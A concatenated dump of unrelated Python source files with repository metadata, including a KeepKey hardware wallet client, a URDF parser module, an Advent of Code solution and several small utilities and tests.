2979426aee0cb9d3f7a35f048ea9d20f5f7f25ea | 1,806 | py | Python | conductor_calculator.py | aj83854/project-lightning-rod | 77867d6c4ee30650023f3ec2a8318edd92530264 | [
"MIT"
] | null | null | null | conductor_calculator.py | aj83854/project-lightning-rod | 77867d6c4ee30650023f3ec2a8318edd92530264 | [
"MIT"
] | null | null | null | conductor_calculator.py | aj83854/project-lightning-rod | 77867d6c4ee30650023f3ec2a8318edd92530264 | [
"MIT"
] | null | null | null | from pyconductor import load_test_values, calculate_conductance
def conductance_calc():
preloaded_dict = load_test_values()
while preloaded_dict:
print(
"[1] - Show currently available materials in Material Dictionary\n"
"[2] - Add a material (will not be saved upon restart)\n"
"[3] - Quit\n"
"To test the conductive properties of a material, simply type in its name.\n"
"Otherwise, type the corresponding number for an option above.\n"
)
main_prompt = input(">>> ").lower()
if main_prompt == "1":
print(f"\nCurrently contains the following materials:\n{preloaded_dict.keys()}\n")
elif main_prompt == "2":
preloaded_dict.addmat()
elif main_prompt == "3":
quit()
else:
try:
calculate_conductance(preloaded_dict[main_prompt])
while True:
again_prompt = input(
"Would you like to try another calculation? [Y]es or [N]o: ").lower()
if again_prompt in ("y", "yes"):
break
elif again_prompt in ("n", "no"):
print("\nGoodbye!\n")
quit()
except KeyError:
if main_prompt == "":
print("\nNo material specified.\nPlease enter a valid material name "
"listed in option [1], or use option [2] to add your own.\n")
else: # TODO: add logic handling whether user wants to add missing material
print(f"\n{main_prompt} is not a valid material or command!\n")
else:
pass
if __name__ == "__main__":
conductance_calc()
| 42 | 94 | 0.530454 | 202 | 1,806 | 4.589109 | 0.49505 | 0.075512 | 0.030205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00708 | 0.374308 | 1,806 | 42 | 95 | 43 | 0.813274 | 0.037099 | 0 | 0.128205 | 0 | 0 | 0.348877 | 0.021301 | 0 | 0 | 0 | 0.02381 | 0 | 1 | 0.025641 | false | 0.025641 | 0.025641 | 0 | 0.051282 | 0.128205 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2980f0b218fed38559f7aa3fa0718ba902a95fb9 | 7,657 | py | Python | hwilib/devices/keepkey.py | cjackie/HWI | 8c1b50aaaac37714b5d61f720b4b06f8aa24c73a | [
"MIT"
] | 285 | 2019-01-31T03:10:19.000Z | 2022-03-31T10:38:37.000Z | hwilib/devices/keepkey.py | cjackie/HWI | 8c1b50aaaac37714b5d61f720b4b06f8aa24c73a | [
"MIT"
] | 426 | 2019-01-31T10:38:02.000Z | 2022-03-28T15:58:13.000Z | hwilib/devices/keepkey.py | cjackie/HWI | 8c1b50aaaac37714b5d61f720b4b06f8aa24c73a | [
"MIT"
] | 128 | 2019-01-30T22:32:32.000Z | 2022-03-28T19:23:46.000Z | """
Keepkey
*******
"""
from ..errors import (
DEVICE_NOT_INITIALIZED,
DeviceNotReadyError,
common_err_msgs,
handle_errors,
)
from .trezorlib import protobuf as p
from .trezorlib.transport import (
hid,
udp,
webusb,
)
from .trezor import TrezorClient, HID_IDS, WEBUSB_IDS
from .trezorlib.messages import (
DebugLinkState,
Features,
HDNodeType,
ResetDevice,
)
from typing import (
Any,
Dict,
List,
Optional,
)
py_enumerate = enumerate # Need to use the enumerate built-in but there's another function already named that
KEEPKEY_HID_IDS = {(0x2B24, 0x0001)}
KEEPKEY_WEBUSB_IDS = {(0x2B24, 0x0002)}
KEEPKEY_SIMULATOR_PATH = '127.0.0.1:11044'
HID_IDS.update(KEEPKEY_HID_IDS)
WEBUSB_IDS.update(KEEPKEY_WEBUSB_IDS)
class KeepkeyFeatures(Features): # type: ignore
def __init__(
self,
*,
firmware_variant: Optional[str] = None,
firmware_hash: Optional[bytes] = None,
**kwargs: Any,
) -> None:
super().__init__(**kwargs)
self.firmware_variant = firmware_variant
self.firmware_hash = firmware_hash
@classmethod
def get_fields(cls) -> Dict[int, p.FieldInfo]:
return {
1: ('vendor', p.UnicodeType, None),
2: ('major_version', p.UVarintType, None),
3: ('minor_version', p.UVarintType, None),
4: ('patch_version', p.UVarintType, None),
5: ('bootloader_mode', p.BoolType, None),
6: ('device_id', p.UnicodeType, None),
7: ('pin_protection', p.BoolType, None),
8: ('passphrase_protection', p.BoolType, None),
9: ('language', p.UnicodeType, None),
10: ('label', p.UnicodeType, None),
12: ('initialized', p.BoolType, None),
13: ('revision', p.BytesType, None),
14: ('bootloader_hash', p.BytesType, None),
15: ('imported', p.BoolType, None),
16: ('unlocked', p.BoolType, None),
21: ('model', p.UnicodeType, None),
22: ('firmware_variant', p.UnicodeType, None),
23: ('firmware_hash', p.BytesType, None),
24: ('no_backup', p.BoolType, None),
25: ('wipe_code_protection', p.BoolType, None),
}
class KeepkeyResetDevice(ResetDevice): # type: ignore
def __init__(
self,
*,
auto_lock_delay_ms: Optional[int] = None,
**kwargs: Any,
) -> None:
super().__init__(**kwargs)
self.auto_lock_delay_ms = auto_lock_delay_ms
@classmethod
def get_fields(cls) -> Dict[int, p.FieldInfo]:
return {
1: ('display_random', p.BoolType, None),
2: ('strength', p.UVarintType, 256), # default=256
3: ('passphrase_protection', p.BoolType, None),
4: ('pin_protection', p.BoolType, None),
5: ('language', p.UnicodeType, "en-US"), # default=en-US
6: ('label', p.UnicodeType, None),
7: ('no_backup', p.BoolType, None),
8: ('auto_lock_delay_ms', p.UVarintType, None),
9: ('u2f_counter', p.UVarintType, None),
}
class KeepkeyDebugLinkState(DebugLinkState): # type: ignore
def __init__(
self,
*,
recovery_cipher: Optional[str] = None,
recovery_auto_completed_word: Optional[str] = None,
firmware_hash: Optional[bytes] = None,
storage_hash: Optional[bytes] = None,
**kwargs: Any,
) -> None:
super().__init__(**kwargs)
self.recovery_cipher = recovery_cipher
self.recovery_auto_completed_word = recovery_auto_completed_word
self.firmware_hash = firmware_hash
self.storage_hash = storage_hash
@classmethod
def get_fields(cls) -> Dict[int, p.FieldType]:
return {
1: ('layout', p.BytesType, None),
2: ('pin', p.UnicodeType, None),
3: ('matrix', p.UnicodeType, None),
4: ('mnemonic_secret', p.BytesType, None),
5: ('node', HDNodeType, None),
6: ('passphrase_protection', p.BoolType, None),
7: ('reset_word', p.UnicodeType, None),
8: ('reset_entropy', p.BytesType, None),
9: ('recovery_fake_word', p.UnicodeType, None),
10: ('recovery_word_pos', p.UVarintType, None),
11: ('recovery_cipher', p.UnicodeType, None),
12: ('recovery_auto_completed_word', p.UnicodeType, None),
13: ('firmware_hash', p.BytesType, None),
14: ('storage_hash', p.BytesType, None),
}
class KeepkeyClient(TrezorClient):
def __init__(self, path: str, password: str = "", expert: bool = False) -> None:
"""
The `KeepkeyClient` is a `HardwareWalletClient` for interacting with the Keepkey.
As Keepkeys are clones of the Trezor 1, please refer to `TrezorClient` for documentation.
"""
super(KeepkeyClient, self).__init__(path, password, expert, KEEPKEY_HID_IDS, KEEPKEY_WEBUSB_IDS, KEEPKEY_SIMULATOR_PATH)
self.type = 'Keepkey'
self.client.vendors = ("keepkey.com")
self.client.minimum_versions = {"K1-14AM": (0, 0, 0)}
self.client.map_type_to_class_override[KeepkeyFeatures.MESSAGE_WIRE_TYPE] = KeepkeyFeatures
self.client.map_type_to_class_override[KeepkeyResetDevice.MESSAGE_WIRE_TYPE] = KeepkeyResetDevice
if self.simulator:
self.client.debug.map_type_to_class_override[KeepkeyDebugLinkState.MESSAGE_WIRE_TYPE] = KeepkeyDebugLinkState
def enumerate(password: str = "") -> List[Dict[str, Any]]:
results = []
devs = hid.HidTransport.enumerate(usb_ids=KEEPKEY_HID_IDS)
devs.extend(webusb.WebUsbTransport.enumerate(usb_ids=KEEPKEY_WEBUSB_IDS))
devs.extend(udp.UdpTransport.enumerate(KEEPKEY_SIMULATOR_PATH))
for dev in devs:
d_data: Dict[str, Any] = {}
d_data['type'] = 'keepkey'
d_data['model'] = 'keepkey'
d_data['path'] = dev.get_path()
client = None
with handle_errors(common_err_msgs["enumerate"], d_data):
client = KeepkeyClient(d_data['path'], password)
try:
client.client.refresh_features()
except TypeError:
continue
if 'keepkey' not in client.client.features.vendor:
continue
d_data['label'] = client.client.features.label
if d_data['path'].startswith('udp:'):
d_data['model'] += '_simulator'
d_data['needs_pin_sent'] = client.client.features.pin_protection and not client.client.features.unlocked
d_data['needs_passphrase_sent'] = client.client.features.passphrase_protection # always need the passphrase sent for Keepkey if it has passphrase protection enabled
if d_data['needs_pin_sent']:
raise DeviceNotReadyError('Keepkey is locked. Unlock by using \'promptpin\' and then \'sendpin\'.')
if d_data['needs_passphrase_sent'] and not password:
raise DeviceNotReadyError("Passphrase needs to be specified before the fingerprint information can be retrieved")
if client.client.features.initialized:
d_data['fingerprint'] = client.get_master_fingerprint().hex()
d_data['needs_passphrase_sent'] = False # Passphrase is always needed for the above to have worked, so it's already sent
else:
d_data['error'] = 'Not initialized'
d_data['code'] = DEVICE_NOT_INITIALIZED
if client:
client.close()
results.append(d_data)
return results
| 37.534314 | 176 | 0.614601 | 863 | 7,657 | 5.225956 | 0.273465 | 0.019956 | 0.04612 | 0.030599 | 0.206874 | 0.092018 | 0.092018 | 0.077827 | 0.054989 | 0.045676 | 0 | 0.018095 | 0.263811 | 7,657 | 203 | 177 | 37.719212 | 0.781976 | 0.0653 | 0 | 0.189349 | 0 | 0 | 0.126143 | 0.021657 | 0 | 0 | 0.003375 | 0 | 0 | 1 | 0.047337 | false | 0.065089 | 0.04142 | 0.017751 | 0.136095 | 0.011834 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
2986e8913a7519f773b1d594848f51448026d50a | 583 | py | Python | utils/HTMLParser.py | onyb/janitor | a46f3bf23467a27c6f5891b64c797295e5cc47d0 | [
"Apache-2.0"
] | null | null | null | utils/HTMLParser.py | onyb/janitor | a46f3bf23467a27c6f5891b64c797295e5cc47d0 | [
"Apache-2.0"
] | null | null | null | utils/HTMLParser.py | onyb/janitor | a46f3bf23467a27c6f5891b64c797295e5cc47d0 | [
"Apache-2.0"
] | null | null | null | from bs4 import BeautifulSoup
from optimizers.AdvancedJSOptimizer import AdvancedJSOptimizer
from optimizers.CSSOptimizer import CSSOptimizer
class HTMLParser(object):
def __init__(self, html):
self.soup = BeautifulSoup(html, 'lxml')
def js_parser(self):
for script in self.soup.find_all('script'):
opt = AdvancedJSOptimizer()
script.string = opt.process(script.string)
def css_parser(self):
for style in self.soup.find_all('style'):
opt = CSSOptimizer()
style.string = opt.process(style.string) | 32.388889 | 62 | 0.680961 | 66 | 583 | 5.893939 | 0.424242 | 0.061697 | 0.066838 | 0.071979 | 0.087404 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002217 | 0.226415 | 583 | 18 | 63 | 32.388889 | 0.86031 | 0 | 0 | 0 | 0 | 0 | 0.025685 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.214286 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
461ea3bb055956b5f646cce50edcc52ff396af68 | 4,041 | py | Python | pcg_gazebo/parsers/urdf/__init__.py | TForce1/pcg_gazebo | 9ff88016b7b6903236484958ca7c6ed9f8ffb346 | [
"ECL-2.0",
"Apache-2.0"
] | 40 | 2020-02-04T18:16:49.000Z | 2022-02-22T11:36:34.000Z | pcg_gazebo/parsers/urdf/__init__.py | awesomebytes/pcg_gazebo | 4f335dd460ef7c771f1df78b46a92fad4a62cedc | [
"ECL-2.0",
"Apache-2.0"
] | 75 | 2020-01-23T13:40:50.000Z | 2022-02-09T07:26:01.000Z | pcg_gazebo/parsers/urdf/__init__.py | GimpelZhang/gazebo_world_generator | eb7215499d0ddc972d804c988fadab1969579b1b | [
"ECL-2.0",
"Apache-2.0"
] | 18 | 2020-09-10T06:35:41.000Z | 2022-02-20T19:08:17.000Z | # Copyright (c) 2019 - The Procedural Generation for Gazebo authors
# For information on the respective copyright owner see the NOTICE file
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .actuator import Actuator
from .axis import Axis
from .box import Box
from .child import Child
from .collision import Collision
from .color import Color
from .cylinder import Cylinder
from .dynamics import Dynamics
from .gazebo import Gazebo
from .geometry import Geometry
from .hardware_interface import HardwareInterface
from .inertia import Inertia
from .inertial import Inertial
from .joint import Joint
from .limit import Limit
from .link import Link
from .mass import Mass
from .material import Material
from .mechanical_reduction import MechanicalReduction
from .mesh import Mesh
from .mimic import Mimic
from .origin import Origin
from .parent import Parent
from .robot import Robot
from .safety_controller import SafetyController
from .sphere import Sphere
from .texture import Texture
from .transmission import Transmission
from .type import Type
from .visual import Visual
def get_all_urdf_element_classes():
"""Get list of all URDF element classes."""
import sys
import inspect
from ..types import XMLBase
output = list()
current_module = sys.modules[__name__]
for name, obj in inspect.getmembers(current_module):
if inspect.isclass(obj):
if issubclass(obj, XMLBase) and obj._TYPE == 'urdf':
output.append(obj)
return output
def create_urdf_element(tag, *args):
"""URDF element factory.
> *Input arguments*
* `tag` (*type:* `str`): Name of the URDF element.
* `args`: Extra arguments for URDF element constructor.
> *Returns*
URDF element if `tag` refers to a valid URDF element.
`None`, otherwise.
"""
import sys
import inspect
from ..types import XMLBase
current_module = sys.modules[__name__]
for name, obj in inspect.getmembers(current_module):
if inspect.isclass(obj):
if issubclass(obj, XMLBase):
if tag == obj._NAME and obj._TYPE == 'urdf':
return obj(*args)
return None
def create_urdf_type(tag):
"""Return handle of the URDF element type.
> *Input arguments*
* `tag` (*type:* `str`): Name of the URDF element.
> *Returns*
URDF element type if `tag` is valid, `None` otherwise`.
"""
import sys
import inspect
from ..types import XMLBase
current_module = sys.modules[__name__]
for name, obj in inspect.getmembers(current_module):
if inspect.isclass(obj):
if issubclass(obj, XMLBase):
if tag == obj._NAME and obj._TYPE == 'urdf':
return obj
return None
def is_urdf_element(obj):
"""Test if XML element is an URDF element."""
from ..types import XMLBase
return obj.__class__ in XMLBase.__subclasses__() and \
obj._TYPE == 'urdf'
__all__ = [
'get_all_urdf_element_classes',
'create_urdf_element',
'create_urdf_type',
'is_urdf_element',
'Actuator',
'Axis',
'Box',
'Child',
'Collision',
'Color',
'Cylinder',
'Dynamics',
'Gazebo',
'Geometry',
'HardwareInterface',
'Inertia',
'Inertial',
'Joint',
'Limit',
'Link',
'Mass',
'Material',
'MechanicalReduction',
'Mesh',
'Mimic',
'Origin',
'Parent',
'Robot',
'SafetyController',
'Sphere',
'Texture',
'Transmission',
'Type',
'Visual'
]
| 26.411765 | 74 | 0.675823 | 508 | 4,041 | 5.259843 | 0.293307 | 0.065868 | 0.022455 | 0.032934 | 0.259731 | 0.241766 | 0.241766 | 0.241766 | 0.225299 | 0.225299 | 0 | 0.002577 | 0.231873 | 4,041 | 152 | 75 | 26.585526 | 0.858247 | 0.286315 | 0 | 0.242718 | 0 | 0 | 0.111429 | 0.01 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038835 | false | 0 | 0.38835 | 0 | 0.485437 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
4620f61e29c562c8eee22b703bf2ebfcf3321f30 | 1,482 | py | Python | rnnparser/RecursiveNN/tests_npRNN/test_tree_utils.py | uphere-co/nlp-prototype | c4623927e5c5c5f9c3e702eb36497ea1d9fd1ff3 | [
"BSD-3-Clause"
] | null | null | null | rnnparser/RecursiveNN/tests_npRNN/test_tree_utils.py | uphere-co/nlp-prototype | c4623927e5c5c5f9c3e702eb36497ea1d9fd1ff3 | [
"BSD-3-Clause"
] | null | null | null | rnnparser/RecursiveNN/tests_npRNN/test_tree_utils.py | uphere-co/nlp-prototype | c4623927e5c5c5f9c3e702eb36497ea1d9fd1ff3 | [
"BSD-3-Clause"
] | null | null | null | import pytest
from npRNN.tree_utils import Node, NodeTree
def test_merge_results():
#sentence='I know a name of the cat on a hat'
sentence='a name of the cat on a hat'
words=[Node(word) for word in sentence.split()]
tree=NodeTree(words, [0, 5, 3, 1, 2, 0, 0])
assert tree.phrase.name =='(((a name) (of the)) ((cat on) (a hat)))'
assert tree.phrase.depth==3
assert tree.history == [0, 5, 3, 1, 2, 0, 0]
tree=NodeTree(words, [0, 5, 0, 0, 1, 1, 0])
assert tree.phrase.name =='((((a name) of) the) ((cat on) (a hat)))'
assert tree.phrase.depth==4
assert tree.history == [0, 5, 0, 0, 1, 1, 0]
tree=NodeTree(words, [2,0,3,2,2,0,0])
assert tree.phrase.name =='(((a name) (of the)) ((cat (on a)) hat))'
assert tree.phrase.depth==4
assert tree.history == [2,0,3,2,2,0,0]
def test_merge_dicrection():
sentence='a name of the cat on a hat'
words=[Node(word) for word in sentence.split()]
merge_history=[3,1,1,0,2,1,0]
all_nodes, _ =NodeTree.directed_merge(words,merge_history)
print all_nodes
composites=all_nodes[len(words):]
print composites
left_merged=NodeTree.get_merge_direction(composites)
expected_left_merged = [[True, False, False, True],[True, True, False, True],\
[True, False, True],[True, True],[True, False, False],[True, False],[True]]
assert left_merged == expected_left_merged
depths = [x.depth for x in composites]
assert depths==[1, 1, 2, 3, 1, 2, 4]
| 38 | 83 | 0.632928 | 251 | 1,482 | 3.657371 | 0.211155 | 0.098039 | 0.045752 | 0.065359 | 0.529412 | 0.436819 | 0.436819 | 0.398693 | 0.377996 | 0.377996 | 0 | 0.04958 | 0.197031 | 1,482 | 38 | 84 | 39 | 0.721849 | 0.02969 | 0 | 0.193548 | 0 | 0 | 0.119694 | 0 | 0 | 0 | 0 | 0 | 0.354839 | 0 | null | null | 0 | 0.064516 | null | null | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4621fb7b46924baa48b672c2c85f2d00296c68a8 | 1,267 | py | Python | pyrefine/script.py | jezcope/pyrefine | 44872592b1c0430d942d6901d7670e7b0ae77b11 | [
"MIT"
] | 27 | 2017-03-29T09:12:43.000Z | 2021-12-16T17:00:14.000Z | pyrefine/script.py | jezcope/pyrefine | 44872592b1c0430d942d6901d7670e7b0ae77b11 | [
"MIT"
] | 7 | 2017-04-02T22:10:22.000Z | 2021-06-01T21:25:26.000Z | pyrefine/script.py | jezcope/pyrefine | 44872592b1c0430d942d6901d7670e7b0ae77b11 | [
"MIT"
] | 2 | 2019-07-31T15:03:21.000Z | 2021-12-20T12:12:15.000Z | """A script is a series of operations."""
import json
import os
from .ops import create
class Script(object):
"""A script is a series of operations."""
def __init__(self, s=None):
"""Parse a script from a JSON string."""
if s is not None:
self.parsed_script = json.loads(s)
self.operations = [create(params)
for params in self.parsed_script]
def __len__(self):
"""Return the number of operations."""
return len(self.operations)
def execute(self, data):
"""Execute all operations on the provided dataset.
Args:
data (:class:`pandas.DataFrame`): The data to transform. Not
guaranteed immutable.
Returns:
:class:`pandas.DataFrame`: The transformed data.
"""
for op in self.operations:
data = op(data)
return data
def load_script(f):
"""Load and parse the script given.
Args:
f (:class:`file` or :class:`str`): Open file object or filename.
Returns:
:class:`Script`: The parsed script object.
"""
if isinstance(f, (str, os.PathLike)):
f = open(f)
with f:
return parse(f.read())
parse = Script
| 21.844828 | 72 | 0.566693 | 156 | 1,267 | 4.532051 | 0.391026 | 0.029703 | 0.02546 | 0.028289 | 0.079208 | 0.079208 | 0.079208 | 0 | 0 | 0 | 0 | 0 | 0.323599 | 1,267 | 57 | 73 | 22.22807 | 0.824971 | 0.40884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.190476 | false | 0 | 0.142857 | 0 | 0.52381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
46220a2b446c7a9b49f727a4d45bc84e233eea22 | 571 | py | Python | makeCourse/plastex/mhchem/__init__.py | dualspiral/makecourse | 96c0d3137b00a400df082f160eabf8a925953067 | [
"Apache-2.0"
] | null | null | null | makeCourse/plastex/mhchem/__init__.py | dualspiral/makecourse | 96c0d3137b00a400df082f160eabf8a925953067 | [
"Apache-2.0"
] | null | null | null | makeCourse/plastex/mhchem/__init__.py | dualspiral/makecourse | 96c0d3137b00a400df082f160eabf8a925953067 | [
"Apache-2.0"
] | null | null | null | from plasTeX import Command, Environment, sourceChildren
from plasTeX.Base.LaTeX import Math
from plasTeX.Base.TeX.Primitives import BoxCommand
# mhchem package - mostly handled by mathjax
# Overrive boxcommands inside MathJaX to avoid extra <script type="math/tex">
class MHBoxCommand(BoxCommand):
class math(Math.math):
@property
def source(self):
if self.hasChildNodes():
return u'$%s$' % sourceChildren(self)
return '$'
class ce(MHBoxCommand):
args = 'self'
class pu(MHBoxCommand):
args = 'self'
| 28.55 | 77 | 0.681261 | 66 | 571 | 5.893939 | 0.606061 | 0.084833 | 0.077121 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.224168 | 571 | 19 | 78 | 30.052632 | 0.878104 | 0.206655 | 0 | 0.142857 | 0 | 0 | 0.028889 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.214286 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4626daaa44d52cdbb1bec3a34b51700caf38c8dc | 448 | py | Python | tests/test_lamost_tools.py | igomezv/astroNN | 50af116f9cbfc684b63e7ddcf8829343a455722b | [
"MIT"
] | 156 | 2017-10-22T01:29:10.000Z | 2022-03-14T10:28:09.000Z | tests/test_lamost_tools.py | AbdulfattahBaalawi/astroNN | 0b970dd1a8d4d5e6d611ffa52cfd3c2ffdcb4643 | [
"MIT"
] | 16 | 2017-11-02T21:29:28.000Z | 2022-03-14T08:40:41.000Z | tests/test_lamost_tools.py | AbdulfattahBaalawi/astroNN | 0b970dd1a8d4d5e6d611ffa52cfd3c2ffdcb4643 | [
"MIT"
] | 46 | 2017-11-01T18:56:03.000Z | 2022-03-07T06:44:22.000Z | import unittest
import numpy as np
from astroNN.lamost import wavelength_solution, pseudo_continuum
class LamostToolsTestCase(unittest.TestCase):
def test_wavelength_solution(self):
wavelength_solution()
wavelength_solution(dr=5)
self.assertRaises(ValueError, wavelength_solution, dr=1)
def test_norm(self):
pseudo_continuum(np.ones(3909), np.ones(3909))
if __name__ == '__main__':
unittest.main()
| 23.578947 | 64 | 0.734375 | 53 | 448 | 5.886792 | 0.54717 | 0.288462 | 0.128205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0271 | 0.176339 | 448 | 18 | 65 | 24.888889 | 0.818428 | 0 | 0 | 0 | 0 | 0 | 0.017857 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.166667 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
462c2089ebfd3afcf679c3d29b9f6e291acb4dc2 | 525 | py | Python | src/solutions/01.py | NNRepos/AoC-2021-python-solutions | 556ccc920b96cedbdc2f554a3bee28a793be4483 | [
"MIT"
] | null | null | null | src/solutions/01.py | NNRepos/AoC-2021-python-solutions | 556ccc920b96cedbdc2f554a3bee28a793be4483 | [
"MIT"
] | null | null | null | src/solutions/01.py | NNRepos/AoC-2021-python-solutions | 556ccc920b96cedbdc2f554a3bee28a793be4483 | [
"MIT"
] | null | null | null | from utils.utils import *
lines = get_input(__file__)
lines_as_nums = lines_to_nums(lines)
def part1(nums):
incr = 0
cur = nums[0]
for num in nums:
if num > cur:
incr += 1
cur = num
return incr
def part2():
nums = []
for i in range(len(lines_as_nums)):
if i < len(lines_as_nums) - 2:
nums.append(lines_as_nums[i] + lines_as_nums[i + 1] + lines_as_nums[i + 2])
return part1(nums)
print("part1:", part1(lines_as_nums))
print("part2:", part2())
| 19.444444 | 87 | 0.590476 | 82 | 525 | 3.52439 | 0.341463 | 0.16955 | 0.266436 | 0.124567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034392 | 0.28 | 525 | 26 | 88 | 20.192308 | 0.730159 | 0 | 0 | 0 | 0 | 0 | 0.022857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.263158 | 0.105263 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
462c4f9e4def6f4455874dce4f3095e44613b4b1 | 1,372 | py | Python | tensorforce/core/baselines/mlp_baseline.py | youlei202/tensorforce-lei | 871ef7f5c41d496aa8ad674854792ebd52ce1546 | [
"Apache-2.0"
] | 1 | 2019-12-21T03:31:33.000Z | 2019-12-21T03:31:33.000Z | tensorforce/core/baselines/mlp_baseline.py | youlei202/tensorforce-lei | 871ef7f5c41d496aa8ad674854792ebd52ce1546 | [
"Apache-2.0"
] | null | null | null | tensorforce/core/baselines/mlp_baseline.py | youlei202/tensorforce-lei | 871ef7f5c41d496aa8ad674854792ebd52ce1546 | [
"Apache-2.0"
] | 1 | 2019-12-21T03:31:39.000Z | 2019-12-21T03:31:39.000Z | # Copyright 2017 reinforce.io. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from tensorforce.core.baselines import NetworkBaseline
class MLPBaseline(NetworkBaseline):
"""
Multi-layer perceptron baseline (single-state) consisting of dense layers.
"""
def __init__(self, sizes, scope='mlp-baseline', summary_labels=()):
"""
Multi-layer perceptron baseline.
Args:
sizes: List of dense layer sizes
"""
layers_spec = []
for size in sizes:
layers_spec.append({'type': 'dense', 'size': size})
super(MLPBaseline, self).__init__(layers_spec, scope, summary_labels)
| 33.463415 | 80 | 0.671283 | 168 | 1,372 | 5.321429 | 0.613095 | 0.067114 | 0.053691 | 0.035794 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00724 | 0.194606 | 1,372 | 40 | 81 | 34.3 | 0.80181 | 0.585277 | 0 | 0 | 0 | 0 | 0.0499 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.4 | 0 | 0.6 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
4637594ad65e429cbd0184284c782da6df047d1a | 482 | py | Python | notifai_recruitment/api.py | BudzynskiMaciej/notifai_recruitment | 56860db3a2dad6115747a675895b8f7947e7e12e | [
"MIT"
] | null | null | null | notifai_recruitment/api.py | BudzynskiMaciej/notifai_recruitment | 56860db3a2dad6115747a675895b8f7947e7e12e | [
"MIT"
] | 2 | 2021-05-21T13:26:26.000Z | 2022-02-10T10:04:55.000Z | notifai_recruitment/api.py | BudzynskiMaciej/notifai_recruitment | 56860db3a2dad6115747a675895b8f7947e7e12e | [
